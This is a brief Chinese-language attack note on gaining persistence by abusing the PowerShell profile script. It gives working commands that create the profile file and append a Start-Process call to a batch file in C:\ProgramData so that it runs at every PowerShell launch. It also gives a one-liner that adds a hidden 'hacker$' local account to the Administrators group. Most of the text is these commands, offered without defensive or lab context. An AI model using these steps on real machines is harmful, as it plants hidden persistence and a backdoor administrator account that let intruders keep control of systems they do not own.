PowerShell 配置文件是在 PowerShell 启动时运行的脚本。
在某些情况下,攻击者可以通过滥用PowerShell配置文件来获得持久性和提升特权。修改这些配置文件,以包括任意命令,功能,模块和/或PowerShell驱动器来获得持久性。
echo $profile Test-path $profile # 结果返回false,表示没有该文件 New-Item –Path $Profile –Type File –Force # 强制创建一个 $string = 'Start-Process "C:\ProgramData\1.bat"' $string | Out-File -FilePath $profile -Append # 把变量$string内容写入到配置文件 more $profile
net user hacker$ 123456 /add && net localgroup administrators hacker$ /add